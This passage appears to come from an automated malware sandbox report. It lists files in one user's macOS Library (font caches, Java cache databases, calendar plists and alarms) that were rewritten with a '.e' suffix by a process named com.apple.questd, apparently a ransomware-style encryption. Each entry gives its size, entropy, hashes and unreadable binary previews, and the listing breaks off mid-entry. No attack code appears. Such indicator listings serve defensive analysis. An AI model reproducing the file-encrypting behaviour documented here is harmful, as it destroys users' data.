                                                                                                    Preview: .R.1N\.:....r....a...m...e:..."c.D.......:.g..V......N3.M=..`.j1Y...9.Uw...},.i...hi...*i^.........at...K..s..F..j...o+.\.....5.b.M..hK.D..+.ZYo.&.....V?.....2.{..W^.9......6........?.dP.9.........W).....O....[..z\`....ki5..#.w...(..].K.. .....a..81.)5..`%.y..(B\.R#.P..(..JE..............c.....raj..........}=...... .}..g.l..~.@.....S.!Z........7FV...Y. ...$.....qy..-U.|..&Gb..DM...J.QY..F..j...o...\..B...E.F.m...<..,..(.(8l..{,>..s..c.......M.Rs.D.... ..O...Cu...OI..SG....-.b...x..K...7>(l...5..VWT...T...a........(.cf.f..4`.F.M..}.UGB.L...+.Iu.....N`B.P.....l.b.v.D...Z...?.qz..2.....6].....5..w...e..Ab...hdI{r.&~.i..P.r.G.w..8o&e&........H.Q....2Di.$.....&..J.*.!.....|......A......z......P ......t....Kc..=.V..7@J...;8..NH.{....by.d.Qf..."0d..^j.+.6....l5........K..t>/.&.aV.... f....-..E.n....H..x..[...V......../.....9}`...-..cb....2V...?.N.7VSrO.%-..<...+.........8-..M.*sb...,.....w...0is..c..>.!.3.{.,..L....9......(..=s.e..z..Y[d.0......L.....3T......+$"...g[......^...0..G.&bQ...L.j9.
                                                                                                    /Users/ben/Library/Caches/com.xamarin.fontconfig/.84c0f976e30e948e99073af70f4ae876-le32d4.cache-3.e
                                                                                                    Process:/Library/AppQuest/com.apple.questd
                                                                                                    File Type:data
                                                                                                    Size (bytes):439940
                                                                                                    Entropy (8bit):7.217199484234223
                                                                                                    Encrypted:false
                                                                                                    MD5:FF13FF556D6EF4E3B9600C923877772F
                                                                                                    SHA1:CEE1D1B2EF4E90496FF5E1B263CC1DC91C01DBBD
                                                                                                    SHA-256:A9B1077DD103176320692432B889BCBADF900615189ABE69C0A8F2EB698C5F2A
                                                                                                    SHA-512:A1D09DA812717C4FAEFFE0E2E1EDAE2B48F144BD41934B04976FAF097BD9DADC9F0557B230AA886FFD05DFA514E233E127E3839E5B07D34FC740E5578914C88B
                                                                                                    Malicious:false
                                                                                                    Reputation:low
                                                                                                    Preview: ........,..T....b.~.-.)....W..L...p.b5..b..":!.2........Z..*...Yf..#6..L;..Y....1.X...v..-.O......O...g..1.X..qk..w......f..Ja.']Fj.T._~t.} .*>T..`..{..=..2.....-....$UqD..D."...Ik.|....<z!....[.<... ..K..[z..c"..)..ro.."..?.B....f.{.`&..?......o..X$.Le\.../.....W=a<.......!6..'F.m.....y*.....;Ta........x.*.....e.>.a..4............}......%kEL.4l.....sk......{Y.I..2i.........H....p...I.Z..I[.....%...3..I.k..g!k.]l.^I.....~]1r._...|F...1...d.=E...r................d....X.L.I...90..&[.u6..u*O.'...e..+..~...v.....R...X..F....&.........IE...l.........H.G...?m....X..x.\.Y.......9.,.S[c.Oa.[#..K*.!f|EH.t...h...5..@..\....e...)=............E<2..\.r-X.7.....(.yp.............l...Eq......ZQ,.EQ......(...\.'.s..C....P.y5Y.#....m,......V...;..!.b..{..Mfy.XT.!.........NPe..F0.."..7....a.J....H9..6..w07.{."{-.iP.....d.fk|./)...m..=uu.3.._.uH.@..~h..#..<.1..,-g........5`.."vS.w@.3.|X...D..<.....E.0]..`..Z.u....l%..y...+.z.9.+...k9.$.#IA.L.B.&e..p..J..y[}]#O.....iH.........5n.N+.."3.D.Y_.._........Xb.S.
                                                                                                    /Users/ben/Library/Caches/com.xamarin.fontconfig/.84c0f976e30e948e99073af70f4ae876-le64.cache-3.e
                                                                                                    Process:/Library/AppQuest/com.apple.questd
                                                                                                    File Type:data
                                                                                                    Size (bytes):605886
                                                                                                    Entropy (8bit):7.031927463225704
                                                                                                    Encrypted:false
                                                                                                    MD5:FADBC1C4BA8075A54D21F8AE282EA87E
                                                                                                    SHA1:52E5C577DE70471E0924C2FB6E2A5FB61BDC4860
                                                                                                    SHA-256:1986C0146274B15BFB8604F59CFD6D963D92B702A20637DEEA24A90D1467C766
                                                                                                    SHA-512:E7126D9C3AC386EACB861FE508AFA55C0D4A2C6AE001B5C738E33353A82A79CD21AA1D671EE38DE5F9E28CC9E128FF7F8E99CD033C05F771161FD60A0BB4A765
                                                                                                    Malicious:false
                                                                                                    Reputation:low
                                                                                                    Preview: .........\D6 ..y.......A=.h2..I.........=.h2..I......U.=..p.b5..b..":!.2..........)/..cHc?.,)nP&..a...........a-. .%\P9.f....N|s.s..U.../....P.&...5.fN....gI...Cg^?.$<N..U....k.^...lQ..zz$..|..... .vez.T...H..3.ir.B..[j;pYRF.r..7@...Y...m....P..p_..D..x.C....*..~VNn........ZEaQ.gm._..C\...ez>!.1-..GGU+f3.'.y.RY.#.......k3[~BD..C..0."...I.(!....."...}p~.. .....c.&..rW=.6/.w.O'....@.O........5EXL....Q...^8.r#.8...>.,....5...t<.Y.j.T.R...76K...N7.8.]/p...w\.p...]|.x..A..l*.a......2.8T..sB...Xk$tX...r..e..C\../.......{+.AS{.....O.e.7<"?......./a.2.".6....#xpm...o8{.......x:.S&..5..J..."K...\..@....Z..-Av],.Fj.VWi.G.k#J..........=..|;..}Qf..r....(.k..gx..O..Vg.%i.HQI...f....s~|.E.pS..F.N..?'.a{_.L..X..L.......Oe..\..<,.^u<....U....J...nv...P?.Q...w.p%..i_......{.VD..R7....4..}...........t[<a.....T....'.U.9m..s........T'2...J..X.0.... 7..i...Yz../J....A.].s).....i.jPb.K....&.K........v..Q..n\8jI.......rf...Do.P...........$.........dk,M..M.5...0..E.n.~..o...SWJ..T.)`.o{...$..._...~...i...L.x.
                                                                                                    /Users/ben/Library/Caches/com.xamarin.fontconfig/.b0a71e6bf6a8a1a908413a823d76e21f-le32d4.cache-3.e
                                                                                                    Process:/Library/AppQuest/com.apple.questd
                                                                                                    File Type:data
                                                                                                    Size (bytes):506504
                                                                                                    Entropy (8bit):7.330067087731693
                                                                                                    Encrypted:false
                                                                                                    MD5:5252AD86B4436ADC53242396B5949722
                                                                                                    SHA1:7DAB3015ECE34D8D2ACF36DFBDF9FF61DED98A11
                                                                                                    SHA-256:56ED5FE1B9C650FE096C4A75657A63AF7BFC8E7CF2E56EAB729F44223034F6E3
                                                                                                    SHA-512:EB1C11A9BA0C74B75F8A26ED137E055D5827A62C4705698F69F766F3EB2D53E3DDCF86461E06AD0C1C3E839AA2391FBA93E4BD69CBF85DE7B1F36327235EC164
                                                                                                    Malicious:false
                                                                                                    Reputation:low
                                                                                                    Preview: ........I...x..o.......A!....lXsI`s..f..D,....d..,....E...<.9=g.Z..*...YL..........lDH6LD.0.7.d..z...w..H...........l.._.....l.F..I....n..g(......%.!....X..wo..$..U.A........*......v3.h........z...G...r.l...p..BW..d.......d.A...`.w.....R.....p.D.u+i./\v..<...v..t...e...].i._.a....J."y. ;(.......i-|h.OY?'.Md...V6..xy.......$'.m..8... .F3n.o.W.....b.d...G:.4..<......:N..x..b...^2@...P...>...l.XK.^o....R..0.4......].4jw6.....8.i.+...:..s]T.......0...mk.C.|O. uz..r.*.;.Ra...;0.<.....L........W\(...G!.W.....=..N.v.}...=G.[..B.'.J..Z...)..>.$...........A....!TY.....e..Q..$]+.I...dw....x.}>|KmBS.@3.L.W.......,...N.BF..1...........+.a....{....O....(.....g.%Q...f..Lh........6_xt.....N......}.I.kE...L#.q+...84Vji..-..`._...N.!. }..g..az:...Jd.......~.....f..#g.....s..[...~..8.<.vuq(g6u......w.c./..ia.....,....(.OwQ.:.TU..W.Il.l8.....K7........*.ne.......Q.0...6\..Jbyz.%.s...^.x.W.F<vgN..@.....q<,......).&..W.'.".......1..+...u| ......*.\.f.dm......h.s..^a".0.jL.....L.......y....c....7/.7......F}
                                                                                                    /Users/ben/Library/Caches/com.xamarin.fontconfig/.b0a71e6bf6a8a1a908413a823d76e21f-le64.cache-3.e
                                                                                                    Process:/Library/AppQuest/com.apple.questd
                                                                                                    File Type:data
                                                                                                    Size (bytes):692676
                                                                                                    Entropy (8bit):7.152943585430877
                                                                                                    Encrypted:false
                                                                                                    MD5:FF53C079DE2D1923D828878DFC723868
                                                                                                    SHA1:CEB8B94708A9451963708BCAFF730A945EB4B27A
                                                                                                    SHA-256:CD0136B4BBB8C53DBAB3CF6FBB9E818E509697A2638C3F8FB7387B1C247E9625
                                                                                                    SHA-512:5FBFCF9C12DC65444B341985018E340A5478FCC18082260E29BD5778A059E74510F3D7C49CFBBD4D310BBAD45527329C9EF8FA0F79AAC2DA2FA52193EA5B6275
                                                                                                    Malicious:false
                                                                                                    Reputation:low
                                                                                                    Preview: ........!......c.......Ap.;.q...........p.;.q........U.=I`s..f..D,....d..,....E..^......Z..*...Y.>y...`...]..lY.O....#.#.S...8..1......C.x.C.....%(8...>Tkf...v&.;..5.R..H...p..i.#4.|u.5.'I...<...*^..KR.f:..5J...J.1F..$..;(.X,..xI.,iz..y..b.L......d5f..s...Q..Hy.......-...;.F...!`......-2n.\%j.._.V..rv..J..J.?bgl....e.,.....E.i.JR.9..AX9..-....4.zCp.cqn0..d.........1...$......F..2#nt..=k@ .....r.. W{`./[....a.<...h.Z...zf..`....n.W$.NO.QnS...\~.BC.....G(4...h....v@.)....dH.......q c..V*....\..q.f/q5A.B...:.,.o......mA7.Bg.n.........Us..{.&.l_X..lB..T......Y...`....'.8....%b.T.e>..........y\.U..Q.+O,......V..c....~.;.......gf}....#...........ve8.u+......).TC9....(..~.[.....}.....C.{.S..Rnu.}..5.{.>...S..(..T^.......3........9.G.......!..-..*..-+.........bO..vgN.8o..2S..n.9..P#....?>g.....!.3..b...m........_......|...{.rd...V2Q..'.j.....'_..`c...g.IN....).4...R}.N4E.`.B.5:.."..n....z8~...x(e.u....|....}..1.$........m..`./.C.p.(.=i..NZ.........>K...l#...%.....[.G..QS.sE.{.l3.`|X.]..E......
                                                                                                    /Users/ben/Library/Caches/net.java.openjdk.cmd/.Cache.db-shm.e
                                                                                                    Process:/Library/AppQuest/com.apple.questd
                                                                                                    File Type:data
                                                                                                    Size (bytes):33091
                                                                                                    Entropy (8bit):3.2796670989949335
                                                                                                    Encrypted:false
                                                                                                    MD5:B85F480100363E5E7559D90BB0E3D7BF
                                                                                                    SHA1:9F81CB4B8F3940ECA57599D841E10D6AF70E02F4
                                                                                                    SHA-256:FDF63BBF63A95097433CFB35D8E76AE40A9AAE963A3A47757E922353F217C46C
                                                                                                    SHA-512:22C065C49B19367A05697A85299F038653CE86F9CA97B7ADF5B2FAB18857CEA9074C3573304EC1ED4E4D4F45E2C1E570BA2B6A28FA4B4EADFB2954AC0642297E
                                                                                                    Malicious:false
                                                                                                    Reputation:low
                                                                                                    Preview: >.k....L6~Fe.............................\ck?N..>.k....L6~Fe.....................L.D<.+..\ck?N...........9.o..h$.9.o..h$.........................................................................................................................................................................................................................L.D<.+..........................................................................................................................................................................................................................................................L.D<.+..........................................................................................................................................................................................................................................................L.D<.+.................................................................................................................................................
                                                                                                    /Users/ben/Library/Caches/net.java.openjdk.cmd/.Cache.db-wal.e
                                                                                                    Process:/Library/AppQuest/com.apple.questd
                                                                                                    File Type:data
                                                                                                    Size (bytes):305
                                                                                                    Entropy (8bit):4.227184134998451
                                                                                                    Encrypted:false
                                                                                                    MD5:4E6BDA8E6124B92D84A6F01E74479435
                                                                                                    SHA1:12E3E61BF223CAD272BAD62FAC40A6742DBA96C3
                                                                                                    SHA-256:67BAB761DDB4F0DE3AD683630D9B76C2ADA7136A36E8D2EC13023A59A9ECC178
                                                                                                    SHA-512:BF8999595A05AF4C039D28E3FC9B6098BA49C95C261448D94009924D636537132610B1975D2A1F972E33651A8F44C186A86CB0D49C51BAAA11D87168B2CEE66E
                                                                                                    Malicious:false
                                                                                                    Reputation:low
                                                                                                    Preview: .................D....|.......xV..ZB..ig...d...S.,L.....E..sv..xv..#0..^u..jI.....L.....o5..R7..y5...=..i&...x...&.......ay..:f..y\..@N..9U...S..Gs.......pJ.....................................................................................................................................................
                                                                                                    /Users/ben/Library/Caches/net.java.openjdk.cmd/.Cache.db.e
                                                                                                    Process:/Library/AppQuest/com.apple.questd
                                                                                                    File Type:data
                                                                                                    Size (bytes):53589
                                                                                                    Entropy (8bit):3.5774506420769296
                                                                                                    Encrypted:false
                                                                                                    MD5:E9CE564063556744943B64D751B2AADB
                                                                                                    SHA1:31682FAA235F0C4E86661DC7BEE4B328D2D47C03
                                                                                                    SHA-256:A8EDE8E176BA32D3877A22532D7013BEE6A8A259A9D5989E8A37005D45DD5186
                                                                                                    SHA-512:53BC67A8277B1CE41A7F3107978E87F9A8433D7B6DF69EB5C2E076CCCF7215FAEEA1A13863DD9A7E509EBF23C177FCA7FCE95F50EA65F2A3119BA79B2C3A2AB7
                                                                                                    Malicious:false
                                                                                                    Reputation:low
                                                                                                    Preview: .#.1rS..a....lT........t..S..0..........U.....5.~./..efrt...7...t...7............L.D<.+.......]!..1I............j.....".y.c.F0....h.X.3..........................................................................................................................................................................................................L.D<.+..........................................................................................................................................................................................................................................................L.D<.+..........................................................................................................................................................................................................................................................L.D<.+.................................................................................................................................................
                                                                                                    /Users/ben/Library/Calendars/438451CB-2554-4C3A-8B26-D0D56E4F2EC5.calendar/.Info.plist.e
                                                                                                    Process:/Library/AppQuest/com.apple.questd
                                                                                                    File Type:data
                                                                                                    Size (bytes):1010
                                                                                                    Entropy (8bit):7.126878153370372
                                                                                                    Encrypted:false
                                                                                                    MD5:5211C7E0DBE9BBAB4869DD771968BA2C
                                                                                                    SHA1:442634CAD84F6DAFCEF1401BEA85B76170188CBA
                                                                                                    SHA-256:14AEE00BB44726810239BC3AA5C6EAA958035B83D807D85300BC3336AEA45A85
                                                                                                    SHA-512:EA104B77D3CF96FCBC4F318488A26384DFF9AF40AED14727CD3627DED409915E19688A1E5AFD04A19562CE1E1728B2B37A698D76A89B0332245AF315E9A9E26A
                                                                                                    Malicious:false
                                                                                                    Reputation:low
                                                                                                    Preview: ...#......}PmZ.C....n..Yj.....n.......C...m.......DV.R..B.Y...aIf.........7.?P..|.X...J+.S...Y.........C.....u4..t.^j..OYRQ..d.......9.hp+.l.............5.....S<|o.M...:...............+..q...=9..P+..20........qY.U..S....D....#.T...6.........?...a.,..N....u..t..y8...HR4Ldj.m..C..U....(...1y...oVC.`.g........:.>&k..x*..E....#.;[.Dl.v6.%......p....A...|D.O/......K..Cj....,.U..{r..G(.......? ...pl.L......d1...|......I.......1y...oVCEJ.?...i.U..:..w...n.R...r...i....*Q..;..q.....2...A...|..$.S....z...].....*...K...T-.e._....`.(....7..rQj..L(p)./..B.J..U.tkA.A. .....+.....2Y....A...|.. ...A.".E..Y...@..?.....HR4Ldj..^r4|.Fm..../..1y...oVC....=.i..??g3...{r..G(...."..".`7.<z...G........n<....pj...d......................D....|.......xV..ZB..ig...d...S.,L.....E..sv..xv..#0..^u..jI.....L.....o5..R7..y5...=..i&...x...&.......ay..:f..y\..@N..9U...S..Gs.......pJ...........................................................................................................................................
                                                                                                    /Users/ben/Library/Calendars/438451CB-2554-4C3A-8B26-D0D56E4F2EC5.calendar/LocalDefaultAlarms/.EventAllDayAlarms.icsalarm.e
                                                                                                    Process:/Library/AppQuest/com.apple.questd
                                                                                                    File Type:data
                                                                                                    Size (bytes):546
                                                                                                    Entropy (8bit):6.135226100514228
                                                                                                    Encrypted:false
                                                                                                    MD5:5F8BEE5117343872AE8A57F6C88DE1DA
                                                                                                    SHA1:606DC0F7C434E67D1FED6FBA6794F48F7D43E47E
                                                                                                    SHA-256:CD49DA2BB06186858A11C38FECED088E53D1718CE1754D856D63D037D02BC565
                                                                                                    SHA-512:7C125141A1CA0DEB2676BFD3165F5D570C7807486B10001512474562CBE88FEF0F9346C2002FD97F6B7449AF525F7019F26D122220B93FD26A3A20C7F8048E51
                                                                                                    Malicious:false
                                                                                                    Reputation:low
                                                                                                    Preview: xu."u..L.Q...@..vr.I&......;.......6.;.S.b.:......E.A..4}.z........%..+G@>......A.U....{.....XQm......u..[Ev@...Ma?...Z).f...q.......EK.#.(7....s.r+...C..:l*....Z.O+...M.M#d....."9c.MQ.......m.+..'.....AO..X.|C...s..}.z.....Y.r.{.#..)..{..k..................D....|.......xV..ZB..ig...d...S.,L.....E..sv..xv..#0..^u..jI.....L.....o5..R7..y5...=..i&...x...&.......ay..:f..y\..@N..9U...S..Gs.......pJ.....................................................................................................................................................
                                                                                                    /Users/ben/Library/Calendars/438451CB-2554-4C3A-8B26-D0D56E4F2EC5.calendar/LocalDefaultAlarms/.EventTimedAlarms.icsalarm.e
                                                                                                    Process:/Library/AppQuest/com.apple.questd
                                                                                                    File Type:data
                                                                                                    Size (bytes):554
                                                                                                    Entropy (8bit):6.145866132440787
                                                                                                    Encrypted:false
                                                                                                    MD5:51E03EA2443556F81793FB97DC51727F
                                                                                                    SHA1:4E64C917312EE2050A4E43940B37DEAF9C7624D4
                                                                                                    SHA-256:604F95465A2B9C8B5BB11EE1B06328B6B799D15E973ABFFEDA902FCA3580899C
                                                                                                    SHA-512:9E510B6FA8EB877890A96B902B5D1355CA435307D9FB68FD0C2A2E4DE603F1DB795D6D1AE3FADA09A688C45113B587F52AFBCC55E52DAE18672206C8E1AFB612
                                                                                                    Malicious:false
                                                                                                    Reputation:low
                                                                                                    Preview: xu."u..L.Q...@..vr.I&......;.......6.;.S.b.:......E.A..4}.z........%..+GG..]4...d..]dxU.(.Y)#.{.J.....9..{Q.|]......z}..mE#.Qv..P\....a.fR...9-.)2...a]....>...HD.........!QS..f..B7...`..Y..k ... ..?.}.y.p.b*....%...?..:9..v....n/m..LP...7.0.%~...E...................D....|.......xV..ZB..ig...d...S.,L.....E..sv..xv..#0..^u..jI.....L.....o5..R7..y5...=..i&...x...&.......ay..:f..y\..@N..9U...S..Gs.......pJ.....................................................................................................................................................
                                                                                                    /Users/ben/Library/Calendars/5DA11817-A917-4E66-9D7D-7C3E0F9DE223.calendar/.Info.plist.e
                                                                                                    Process:/Library/AppQuest/com.apple.questd
                                                                                                    File Type:data
                                                                                                    Size (bytes):1098
                                                                                                    Entropy (8bit):7.2054798742171915
                                                                                                    Encrypted:false
                                                                                                    MD5:3AB4724422C403CF3362184379BD19EC
                                                                                                    SHA1:F75CDD6CEC20B8E397B8DE58488557702FD88353
                                                                                                    SHA-256:DC5C3D92D7A27D54EC201C280B95B3B76787D14C7453C93FB76B659691EBD494
                                                                                                    SHA-512:34DAC03CA4DCCE65AEC5098F49BD0C5F705E50761AB9DA67D13F52668BF9D759CAAE8DAD2B6300EB8CEB0129D99815A04537B8E8CBE5B19099EB7913B1D3D0C8
                                                                                                    Malicious:false
                                                                                                    Reputation:low
                                                                                                    Preview: ...#......}PmZ.C....n..Yj.....n.......C...m.......DV.R..B.Y...aIf.........7.?P..|.X...J+.S...Y.........C.....u4..t.^j..OYRQ..d.......9.hp+.l.............5.....S<|o.M...:...............+..q...=9..P+..20........qY.U..S....D....#.T...6.........?...a.,..N....u..t..y8...HR4Ldj..2&.h...%.vWN..1y...oVC.`.g........:.>&k..x*..E....#.;[.Dl.v6.%......p....A...|D.O/....7<y......8.o...h .hKC......}O.;./QB.G....D...a....=.d.......i .......8.I...:..........80.....B.z..O.....H.qU.Lm..zP_....5..y=.u.nm.C...J5..m....u.Q..z......^.b......X[.......i_..*..}.......?UM9..P+..2.tI....It...]P...".z...........&........M{..ek..N71....T.m.O....ghV.e.D..6.............!9..P+..20.............(&<..........n.R....L\..S........%\^.[...o....kIUW..*Q..;......a.J.;.wTM.U..x.Zc.o...E.&.h.(..UE.,y^..}.....z....3\.Y.ZI.:..................D....|.......xV..ZB..ig...d...S.,L.....E..sv..xv..#0..^u..jI.....L.....o5..R7..y5...=..i&...x...&.......ay..:f..y\..@N..9U...S..Gs.......pJ...................................................
                                                                                                    /Users/ben/Library/Calendars/5DA11817-A917-4E66-9D7D-7C3E0F9DE223.calendar/LocalDefaultAlarms/.EventAllDayAlarms.icsalarm.e
                                                                                                    Process:/Library/AppQuest/com.apple.questd
                                                                                                    File Type:data
                                                                                                    Size (bytes):594
                                                                                                    Entropy (8bit):6.398560612343977
                                                                                                    Encrypted:false
                                                                                                    MD5:3057D315DE22FF1D24429FB150E6B427
                                                                                                    SHA1:F5C2A52710A356107BD68727B6867707C8F164F0
                                                                                                    SHA-256:37F7DDC5D4BEC9DEDE2525A8C202A1D6867B8D8BE4129E9CD96C4E039ADC53E1
                                                                                                    SHA-512:6A214F29CA8D0571415D1D66CF7C3CC30630BCEC37368EC686B8989AE41895B3D7F225417F0E857AC0AFB206222A6C310842B1125A2645971C08140BA9025F4D
                                                                                                    Malicious:false
                                                                                                    Reputation:low
                                                                                                    Preview: xu."u..L.Q...@..vr.I&...@[H._.T....x.f.]...q........yV2.sR....G...F........Z9..........t..ef8.0G......G...N.R.....FJ....W....eC5..l.....=......?.z.Ec.).Y}w>._.l...I...`....m1..<}81..|...-.g....1R.{....[...6l..\..j...x/.6..I.6......n#.|.;;Xy.%~...E.e.AK$..c.......V..<.}~...tQ..]......>w...!................D....|.......xV..ZB..ig...d...S.,L.....E..sv..xv..#0..^u..jI.....L.....o5..R7..y5...=..i&...x...&.......ay..:f..y\..@N..9U...S..Gs.......pJ.....................................................................................................................................................
                                                                                                    /Users/ben/Library/Calendars/5DA11817-A917-4E66-9D7D-7C3E0F9DE223.calendar/LocalDefaultAlarms/.EventTimedAlarms.icsalarm.e
                                                                                                    Process:/Library/AppQuest/com.apple.questd
                                                                                                    File Type:data
                                                                                                    Size (bytes):594
                                                                                                    Entropy (8bit):6.393592661229319
                                                                                                    Encrypted:false
                                                                                                    MD5:D2434D2589DBC75FCDC8A3EFC9D816E9
                                                                                                    SHA1:DC17180BE32B2F79F852F90C6FE18157F4C498D8
                                                                                                    SHA-256:FAB3E1B3C7B3A18F29E0EC2A498856D4BE75A5CE6585E2A34200A1F7A0C8237C
                                                                                                    SHA-512:AE46D17573F42040AE2C9944BD5535BAD211709754A44612A2324C558FF8EF9508554478222DAF09D965DEABA58927C2328353B00D5F55F515E1884D1F3EB18B
                                                                                                    Malicious:false
                                                                                                    Reputation:low
                                                                                                    Preview: xu."u..L.Q...@..vr.I&...@[H._.T....x.f.]...q........yV2.sR....G...F........Z9..........t..ef8.0G......G...N.R.....FJ.....H...r`X....m....'.E..%..A.{.b...D?-.1...|Y......+.v... ....8.....d.)....v....l..[...6l..z{...T.Z.S..I.Du.....Y.....#.....W...}..:.....>.2.:..c..!.O.U.nI.#../..{....u...!................D....|.......xV..ZB..ig...d...S.,L.....E..sv..xv..#0..^u..jI.....L.....o5..R7..y5...=..i&...x...&.......ay..:f..y\..@N..9U...S..Gs.......pJ.....................................................................................................................................................
                                                                                                    /Users/ben/Library/Calendars/5E432E28-F43A-4F44-ADCE-9ACE5FAB134F.calendar/.Info.plist.e
                                                                                                    Process:/Library/AppQuest/com.apple.questd
                                                                                                    File Type:data
                                                                                                    Size (bytes):1010
                                                                                                    Entropy (8bit):7.133535398408758
                                                                                                    Encrypted:false
                                                                                                    MD5:67C8562E9D565586E5F626A5CC4A8025
                                                                                                    SHA1:6B7B2B723C6B7F18A92284B64242D38D2ED8D28C
                                                                                                    SHA-256:3730FD5997D91450B535939286D748D16B5E5A40F77C15F696A5960EEB533421
                                                                                                    SHA-512:FFA523F99B4D906B934537B1FBF7CB221D925EAD03194CBA453309905F0A70BE9BE8D1DB56C8E6744D8597DBE26F6B1641C5FC4B37A2072C18F0C4D63E52E3F0
                                                                                                    Malicious:false
                                                                                                    Reputation:low
                                                                                                    Preview: ...#......}PmZ.C....n..Yj.....n.......C...m.......DV.R..B.Y...aIf.........7.?P..|.X...J+.S...Y.........C.....u4..t.^j..OYRQ..d.......9.hp+.l.............5.....S<|o.M...:...............+..q...=9..P+..20........qY.U..S....D....#.T...6.........?...a.,..N....u..t..y8...HR4Ldj.,..Xv.[..-..6..1y...oVC.`.g........:.>&k..x*..E....#.;[.Dl.v6.%......p....A...|D.O/....7<y.....>.D.IM..[3.......P.. .T.9..P+..20.........+...B....K_...z.T..Q.H.V$...3..U............_..'^.....u.=^..!..Yue............jV...wj.S.....2i...e<X...........p.D[.`G........:.4ZX..<Af.%.Dt....K.8hq.'}k....V..:..^.U..,:..`jV...wj..^{AxA..G.......a.G5.;.T5..y=.u...J....y...9......*..}..?...m.]o5..y=.u.u....5.4..?'...Jj/........!];..........E..................D....|.......xV..ZB..ig...d...S.,L.....E..sv..xv..#0..^u..jI.....L.....o5..R7..y5...=..i&...x...&.......ay..:f..y\..@N..9U...S..Gs.......pJ...........................................................................................................................................
                                                                                                    /Users/ben/Library/Calendars/5E432E28-F43A-4F44-ADCE-9ACE5FAB134F.calendar/LocalDefaultAlarms/.EventAllDayAlarms.icsalarm.e
                                                                                                    Process:/Library/AppQuest/com.apple.questd
                                                                                                    File Type:data
                                                                                                    Size (bytes):546
                                                                                                    Entropy (8bit):6.1367091011521335
                                                                                                    Encrypted:false
                                                                                                    MD5:6FFBB6CD8640233A5F2ED16E5D08C7FE
                                                                                                    SHA1:E73ECBD556ABEDF3E73AC068D4EE7BCA43F30E18
                                                                                                    SHA-256:DBC4A2073F8FEBE7BE01787E7EDCA5314495BBA58FA72530F6F66CC1328E86D5
                                                                                                    SHA-512:A56D91F29389C8DEE7407FB8F2D98381ABFE6F87602A743B261455E71269C0CE6ACB820587CB550F77E6F3BF16E2733A011A96F188144E813F16687F326E5E1B
                                                                                                    Malicious:false
                                                                                                    Reputation:low
                                                                                                    Preview: xu."u..L.Q...@..vr.I&......;.......6.;.S.b.:......E.A..4}.z........%..+GC!W..>.....H2..}.>.F......M'{.............]...s.u.H..)."...k..A'..HW..\Y.....E. '../.....Z.O+...M.M#d....."9c.MQ.......m.+..'.....AO..X.|C...s..}.z.....Y.r.{.#...7.:.....................D....|.......xV..ZB..ig...d...S.,L.....E..sv..xv..#0..^u..jI.....L.....o5..R7..y5...=..i&...x...&.......ay..:f..y\..@N..9U...S..Gs.......pJ.....................................................................................................................................................
                                                                                                    /Users/ben/Library/Calendars/5E432E28-F43A-4F44-ADCE-9ACE5FAB134F.calendar/LocalDefaultAlarms/.EventTimedAlarms.icsalarm.e
                                                                                                    Process:/Library/AppQuest/com.apple.questd
                                                                                                    File Type:data
                                                                                                    Size (bytes):554
                                                                                                    Entropy (8bit):6.157194369968075
                                                                                                    Encrypted:false
                                                                                                    MD5:757F247D945F0B3675CF96FE863AC80A
                                                                                                    SHA1:61F71DE0543DD4DED330BE5EDC0BC9915EF009DB
                                                                                                    SHA-256:87693102E2AD26FB5E5092C56B7B59BBE80C4D73F9C5065ACAA5C777A7BE05DB
                                                                                                    SHA-512:692C7BCA6ADCCEA342CD57357142BBED9A7C315E153329A4AC62B66C3DBB39E801D6E88F86FA7AB45870C773AFBA74F02785CAA6952FB26F6E1A944C98D47819
                                                                                                    Malicious:false
                                                                                                    Reputation:low
                                                                                                    Preview: xu."u..L.Q...@..vr.I&......;.......6.;.S.b.:......E.A..4}.z........%..+G.3:..d.......j.W..3[s:;..05+........S..a.....Vp..Z/.a.._^"....`e..>.E>...aUZ......v...d.D.........!QS..f..B7...`..Y..k ... ..?.}.y.p.b*....%...?..:9..v....n/m..LP...7.0..W...}...................D....|.......xV..ZB..ig...d...S.,L.....E..sv..xv..#0..^u..jI.....L.....o5..R7..y5...=..i&...x...&.......ay..:f..y\..@N..9U...S..Gs.......pJ.....................................................................................................................................................
                                                                                                    /Users/ben/Library/Calendars/7C0AB787-231F-4589-A778-D020F80743CC.calendar/.Info.plist.e
                                                                                                    Process:/Library/AppQuest/com.apple.questd
                                                                                                    File Type:data
                                                                                                    Size (bytes):1018
                                                                                                    Entropy (8bit):7.123767900845584
                                                                                                    Encrypted:false
                                                                                                    MD5:D7CAA5B7119F1BEC0019CA013999D033
                                                                                                    SHA1:8C21418FDAD51503C28A3142D72C4AC83D6DBB53
                                                                                                    SHA-256:D6DB39BBAED5D52448D6302917E975FB7F6987BFA13181C3E9FB4C9BB935C716
                                                                                                    SHA-512:7F428CD6094AE254D0C2A4C27AF716457B4EB44D8A206FD43396522F0BCA7D7BB2BB40CF04F6A65760FCAB628A56477613FF33641BAA73C97B1680FB532C9BDE
                                                                                                    Malicious:false
                                                                                                    Reputation:low
                                                                                                    Preview: ...#......}PmZ.C....n..Yj.....n.......C...m.......DV.R..B.Y...aIf.........7.?P..|.X...J+.S...Y.........C.....u4..t.^j..OYRQ..d.......9.hp+.l.............5.....S<|o.M...:...............+..q...=9..P+..20........qY.U..S....D....#.T...6.........?...a.,..N....u..t..y8...HR4Ldj.,x.....d..B....1y...oVC.`.g........:.>&k..x*..E....#.;[.Dl.v6.%......p....A...|.. ...A...N....u./.d...5...*.I...0..K....;.wTM.Uw. ....C..K..Cj....,.U..{r..G(..N[......S."..y.bR...;..k.aK^].&.....A..a1y...oVCl.[e..T.Y. ....|.....R.J.*=s..C.;..k...z..../U...Z..3....q.$...R...Qv.a.9..P+..20...............\z....:.....u.O.F.6.}.c.G.......a.G5.;.T5..y=.u.P.q.F%h..p.....^..RyhO..mw...t..t.ppzF.T...n.R..j.L....=j..##Yb,...GA...B._d...('.ek..~...................D....|.......xV..ZB..ig...d...S.,L.....E..sv..xv..#0..^u..jI.....L.....o5..R7..y5...=..i&...x...&.......ay..:f..y\..@N..9U...S..Gs.......pJ...................................................................................................................................
                                                                                                    /Users/ben/Library/Calendars/7C0AB787-231F-4589-A778-D020F80743CC.calendar/LocalDefaultAlarms/.EventAllDayAlarms.icsalarm.e
                                                                                                    Process:/Library/AppQuest/com.apple.questd
                                                                                                    File Type:data
                                                                                                    Size (bytes):546
                                                                                                    Entropy (8bit):6.174697930155785
                                                                                                    Encrypted:false
                                                                                                    MD5:4586E6A960CE511468EF904D15B5EF1C
                                                                                                    SHA1:1847DF5CC84AADC628779CA06CFB8411A671189D
